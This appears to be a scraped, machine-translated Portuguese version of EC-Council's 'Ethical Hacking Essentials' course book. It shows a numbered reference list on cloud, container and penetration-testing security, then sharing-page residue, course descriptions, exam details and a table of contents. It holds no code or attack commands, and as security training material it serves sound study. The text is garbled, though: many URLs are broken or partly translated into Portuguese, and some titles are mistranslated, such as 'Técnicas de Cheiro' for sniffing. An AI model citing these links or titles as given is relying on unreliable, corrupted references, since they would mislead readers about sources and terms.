556. (2019), What is Kubernetes, de https://kubernetes.io/docs/concepts/overview/what-is-kubernetes/.
557. Kubernetes Architecture 101, de https://www.aquasec.com/wiki/display/containers/Kubernetes+Architecture+101.
558. (2020), Kubernetes Components, de https://kubernetes.io/docs/concepts/overview/components/.
559. Guillermo Velez, (2019), Kubernetes vs. Docker: A Primer, de https://containerjournal.com/topics/container ecosystems/kubernetes-vs-
docker-a-primer/.
560. Jim Armstrong, principais perguntas respondidas: Docker e Kubernetes? Achei que vocês fossem concorrentes!, em https://
www.docker.com/blog/top-questions-docker-kubernetes-competitors-or-together/.
561. Amir Jerbi, (2017), 8 Docker security rules to live by, em https://www.infoworld.com/article/3154711/8-docker-security
regras para viver por.html.
562. (2018), Security Challenges Related to Containers, em https://www.ariacybersecurity.com/container-security-challenges

blog/.
563. Christopher Tozzi, (2018), 3 vantagens de segurança de contêineres e 3 desafios de segurança, de

https://containerjournal.com/topics/container-security/3-container-security-advantages-and-3-security-challenges/.
564. (2014), Cloud Top 10 Security Risks, de

https://www.owasp.org/index.php/Category:OWASP_Cloud_%E2%80%90_10_Project.
565. Shankar Babu, Chebrolu, Vinay Bansal e Pankaj Telang, Top 10 Cloud Risks That Will Keep You Awake at Night, de
https://owasp.org/www-pdf-archive/Cloud-Top10-Security-Risks.pdf.
566. Lance Whitney, (2019), Como prevenir as 11 principais ameaças na computação em nuvem, de
https://www.techrepublic.com/article/how-to-prevent-the-top-11-threats-in-cloud-computing/.
567. Chester Avey, (2019), 7 Key Cybersecurity Threats to Cloud Computing, em https://cloudacademy.com/blog/key
ameaças de segurança cibernética à computação em nuvem/.
568. Rakesh Soni, (2019), The Rise of Cloud Computing Threats: How to protect your cloud clients from security risk, em https://customerthink.com/the-
rise-of-cloud-computing-threats-how-to -protect-your-cloud-customers-from-security risk/.
569. (2019), Container Security: Examining Potential Threats to the Container Environment, em https://
www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats para -o-ambiente-contêiner.
570. Anurag Kahol, (2019), Cuidado com o homem na nuvem: como se proteger contra uma nova geração de ataque cibernético, de
https://www.helpnetsecurity.com/2019/01/21/mitc-attack/.
571. Adrian Nish e Tom Rowles, (2017), APT10 - OPERAÇÃO CLOUD HOPPER, de
https://baesystemsai.blogspot.com/2017/04/apt10-operation-cloud-hopper_3.html.
572. Jeremy Kirk, (2019), Cloud Hopper: Nomeadas as principais vítimas dos serviços de nuvem, de https://www.bankinfosecurity.com/cloud
hopper-major-cloud-services-victims-named-a-12695.
573. (2018), Cryptojacking Attacks - Securonix Security Advisory (SSA), em https://www.securonix.com/web/wp

content/uploads/2018/06/cryptojacking_security_advisory.pdf.
574. Charlie Osborne, (2018), Cryptojacking Attacks Surge Against Enterprise Cloud Environments, from
https://www.zdnet.com/article/cryptojacking-attacks-surge-against-enterprise-cloud-environments/.

Referências
575. Trenton Baker, (2018), Mobile and Cloud Cryptojacking Skyrockets, de https://www.keepitsafe.com/blog/post/mobile
and-cloud-cryptojacking-skyrockets/.
576. Tara Seals, (2019), 'Cloudborne' IaaS Attack Allows Persistent Backdoors in the Cloud, em https://threatpost.com/
cloudborne-iaas-attack-cloud/142223/.
577. Rene Millman, (2019), falha de metal nu permite que hackers coloquem backdoors em servidores em nuvem, de
https://www.cloudpro.co.uk/it-infrastructure/security/7961/bare-metal-flaw-allows-hackers-to-put-backdoors-into-cloud
servidores.
578. Maria Deutscher, Nova vulnerabilidade Cloudborne expõe servidores em nuvem a possíveis hackers, de
https://siliconangle.com/2019/02/26/new-cloudborne-vulnerability-potentially-exposes-cloud-servers-hacking/.
579. Kelly Sheridan, (2019), Cloudborne: Bare-Metal Cloud Servers Vulnerable to Attack, de
https://www.darkreading.com/cloud/cloudborne-bare-metal-cloud-servers-vulnerable-to-attack/d/d-id/1333969.
580. Aditya K Sood e Rehan Jalil, (2018), Cloudifying Threats—Understanding Cloud App Attacks and Defenses, de
https://www.isaca.org/Journal/archives/2018/Volume-1/Pages/cloudifying-threats-understanding-cloud-app-attacks-and defenses.aspx?utm_referrer=.
581. Anna Bryk, (2018), Cloud Computing: A New Vector for Cyber Attacks, em https://www.apriorit.com/dev-blog/523-cloud computing-cyber-attacks.
582. (2019), os 5 principais problemas de segurança da computação em nuvem; e como eles são usados por hackers,
em https://www.cloudmanagementinsider.com/top-5-cloud-computing-security-issues-and-strategies-used-by-hackers/.
583. Warwick Ashford, (2018), Hackers que visam cada vez mais a infraestrutura de nuvem, de
https://www.computerweekly.com/news/252444716/Hackers-increasingly-targeting-cloud-infrastructure.
584. (2018), A Practical Guide to Testing the Security of Amazon Web Services (Parte 1: AWS S3), de
https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html.
585. Trabalhando com Amazon S3 Buckets, em https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingBucket.html.
586. Rohan Chavan, (2019), Finding and Testing MisConfigured S3 Buckets, em https://rohanchavan.medium.com/finding-and testing-misconfigured-s3-buckets-
d77992c4b5cd.
587. Rmorril, (2012), Google hacking Amazon Web Services Cloud front e S3, de https://www.toolbox.com/
tech/security/blogs/google-hacking-amazon-web-services-cloud-front-and -s3-011613/.
588. As 6 principais considerações para segurança na nuvem e proteção de dados, em

https://searchstorage.techtarget.com/IronMountainCloud/Top-6-Considerations-For-Cloud-Security-and-Data-Protection.
589. (2018), Moving to the Cloud – Cloud Security Considerations, de https://cloudcheckr.com/cloud-security/moving-cloud

segurança/.
590. Gerry Grealish, Six Key Security Considerations for Responsible Cloud Migration, em https://docs.broadcom.com/doc/six
key-considerations-for-responsible-cloud-migration-en.
591. Cynthia Harvey, (2017), Cloud Security Best Practices for 2021, em https://www.esecurityplanet.com/cloud/cloud
security-best-practices.html.
592. Jason Meilleur, (2019), The Growing Dangers of Cyber Attacks and the Need for Cloud Security, de
https://www.360visibility.com/the-growing-dangers-of-cyber-attacks-and-the-need-for-cloud-security/.
593. (2019), 19 práticas recomendadas de segurança em nuvem para 2019, em https://securingtomorrow.mcafee.com/blogs/enterprise/cloud

security/top-19-cloud-security-best-practices/.
594. Matt Miller, (2018), Cloud Security Best Practices, de https://www.beyondtrust.com/blog/entry/cloud-security-best

práticas.
595. Lawrie Brown, Ragib Hasan, YounSun Cho, Anya Kim, Cloud Security, em https://slideplayer.com/slide/6204150/.
596. Muhammad Adeel Javaid, principais ameaças à segurança da computação em nuvem, de

http://nexusacademicpublishers.com/uploads/portals/Top_Threats_to_Cloud_Computing_Security.pdf.
Módulo 12: Fundamentos do teste de penetração

597. Dimitar Kostadinov, (2016), Ethical Hacking vs. Penetration Testing, de
https://resources.infosecinstitute.com/topic/ethical-hacking-vs-penetration-testing/#gref.

Referências
598. Chad Horton, (2018), Types of Penetration Testing: The What, The Why, and The How, em https://
www.securitymetrics.com/blog/types-penetration-testing-what-why-and-how .
599. Chad Horton, (2018), Diferentes tipos de testes de penetração para suas necessidades de negócios, de
https://www.securitymetrics.com/blog/different-types-penetration-tests-your-business-needs.
600. Jatin Jain, (2019), Benefícios do teste de penetração, de https://resources.infosecinstitute.com/topic/penetration-testing

benefícios/#gref.
601. (2018), Penetration Testing Methodology, de http://

www.syrinxtech.com/uploads/1/2/8/1/12815379/penetration_testing_methodology.pdf.
602. Karen Scarfone (NIST), Murugiah Souppaya (NIST), Amanda Cody (BAH), Angela Orebaugh (BAH), (2008), Guia Técnico para
Teste e avaliação de segurança da informação, em https://csrc.nist.gov/publications/detail/sp/800-115/final.
603. Debasis Mohanty, (2018), Demystifying Penetration Testing, de

http://www.infosecwriters.com/text_resources/pdf/pen_test2.pdf.
604. Dr. Daniel Geer e John Harthorne, (2018), Penetration Testing: A Duet, de http://
www.acsac.org/2002/papers/geer.pdf.
605. Ron Gula, (1999), Ampliando o escopo das técnicas de teste de penetração, de http://www.forum
intrusion.com/archive/ENTRASYS.pdf.
606. Arian Eigen Heald, (2018), Understanding Security Testing, em http://

www.infosecwriters.com/text_resources/pdf/Types_of_Security_Testing.pdf.
607. (2018), Pen-Testing Process, de http://

www.mhprofessional.com/downloads/products/0072257091/0072257091_ch04.pdf.
608. Toggmeister (aka Kev Orrey) e Lee J Lawson, Penetration Testing Framework v0.21, de http://
www.infosecwriters.com/text_resources/pdf/PenTest_Toggmeister.pdf.
609. Teste de caixa cinza, de

https://en.wikipedia.org/wiki/Gray_box_testing#White_box.2C_black_box.2C_and_grey_box_testing.
610. (2018), Penetration Testing, de http://www.fma-rms.com/services/remotenetworkpenetrationtesting.php.
611. (2018), What is Penetration Test?, em http://www.secpoint.com/what-is-penetration-testing.html.
612. Manish S. Saindane, (2018), Penetration Testing – A Systematic Approach, de http://

www.infosecwriters.com/text_resources/pdf/PenTest_MSaindane.pdf.
613. (2015), Suplemento de informações: Orientação de teste de penetração, de https://

www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf.
614. Jason Creasey, (2017), Um guia para executar um programa de teste de penetração eficaz, em https://www.crest
Aprovado.org/wp-content/uploads/CREST-Penetration-Testing-Guide.pdf.
615. (2018), A Penetration Testing Model, de https://

www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Penetration/penetration_pdf.pdf?__blob= publicationFile.
616. (2017), Versão 1.1 da Documentação Padrão de Execução de Teste de Penetração, de

https://buildmedia.readthedocs.org/media/pdf/pentest-standard/latest/pentest-standard.pdf.
617. Georgia Weidman, (2014), Penetration Testing - Uma introdução prática ao Hacking, em https://repo.zenk
security.com/Magazine%20E-book/Penetration%20Testing%20-%20A%20hands-on%20introduction%20to%20Hacking.pdf.
618. (2018), Penetration Testing Methodology, de http://

www.syrinxtech.com/uploads/1/2/8/1/12815379/penetration_testing_methodology.pdf.
619. Andrew Whitaker, Denial P. Newman, (2005), Teste de penetração e defesa de rede, de
http://ebook.eqbal.ac.ir/Security/Penetration%20Testing/Network/Penetration%20Testing%20and%20Network%20Defens e.pdf.
MT
EC-Council
CE-Conselho
E HE
ec-council
currículos oficiais do ec-conselho

EHE PT BR

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

EHE PT BR

Enviado por

Direitos autorais:

Formatos disponíveis

Machine Translated by Google

EC-Council New Mexico

Página II Ethical Hacking Essentials Copyright © por EC-Council Todos os

Página III Ethical Hacking Essentials Copyright © por EC-Council Todos os

Outros programas do EC-Council

O objetivo do programa de treinamento da CSCU é fornecer aos alunos o

Defesa de Rede: Defensor de Rede Certificado

Os alunos matriculados no curso Certified Network Defender obterão uma compreensão

Página IV Ethical Hacking Essentials Copyright © por EC-Council Todos os

Hacking ético: Hacker ético certificado

Teste de penetração: Profissional certificado em testes de penetração

Página V Ethical Hacking Essentials Copyright © por EC-Council Todos os

Computação forense: Investigador forense de hacking de computador

Tratamento de Incidentes: Manipulador de Incidentes Certificado pelo EC-Council

O programa Certified Incident Handler (E|CIH) do EC-Council foi projetado

Gestão: Chief Information Security Officer certificado

Página VI Ethical Hacking Essentials Copyright © por EC-Council Todos os

Segurança de aplicativos: Engenheiro de segurança de aplicativos certificado

A credencial Certified Application Security Engineer

Tratamento de Incidentes: Analista de Inteligência de Ameaças Certificado

O Certified Threat Intelligence Analyst (C|TIA) foi projetado e desenvolvido em

Página VII Ethical Hacking Essentials Copyright © por EC-Council Todos os

No cenário de ameaças em constante mudança, o C|TIA é um programa de treinamento essencial em Threat

Tratamento de Incidentes: Analista SOC Certificado

O programa Certified SOC Analyst (CSA) é o primeiro passo para ingressar em um

Página VIII Ethical Hacking Essentials Copyright © por EC-Council Todos os

Informações do Exame EHE

Detalhes do Exame EHE

Título do exame Princípios Básicos de Hacking Ético (EHE)

Código do exame 112-52

Disponibilidade EC-Council Exam Portal (visite https://www.eccexam.com)

Pontuação de aprovação 70%

Página IX Ethical Hacking Essentials Copyright © por EC-Council Todos os

Módulo 01: Fundamentos de Segurança da Informação 1

Fundamentos de Segurança da Informação 3

Leis e regulamentos de segurança da informação 18

Módulo 02: Fundamentos do Hacking Ético 39

Metodologia Cyber Kill Chain 41

Conceitos de Hacking e Classes de Hacker 54

Diferentes fases do ciclo de hacking 61

Conceitos, escopo e limitações do hacking ético 69

Ferramentas de hacking ético 78

Módulo 03: Ameaças à Segurança da Informação e Avaliação de Vulnerabilidade 95

Malware e seus tipos 103

Avaliação de vulnerabilidade 196

Módulo 04: Técnicas de quebra de senha e contramedidas 227

Técnicas de quebra de senha 229

Ferramentas de quebra de senha 252

Contramedidas de quebra de senha 257

Módulo 05: Técnicas de Engenharia Social e Contramedidas 261

Conceitos de Engenharia Social e suas Fases 263

Técnicas de Engenharia Social 275

Ameaças internas e roubo de identidade 303

Contramedidas de Engenharia Social 314

Módulo 06: Ataques e contramedidas em nível de rede 331

Conceitos de detecção de pacotes 334

Técnicas de Cheiro 347

Cheirar Contramedidas 360

Página X Ethical Hacking Essentials Copyright © por EC-Council Todos os

Ataques DoS e DDoS 368

Contramedidas de ataque DoS e DDoS 391

Sequestro de Sessão 395

Ataques de Sequestro de Sessão 396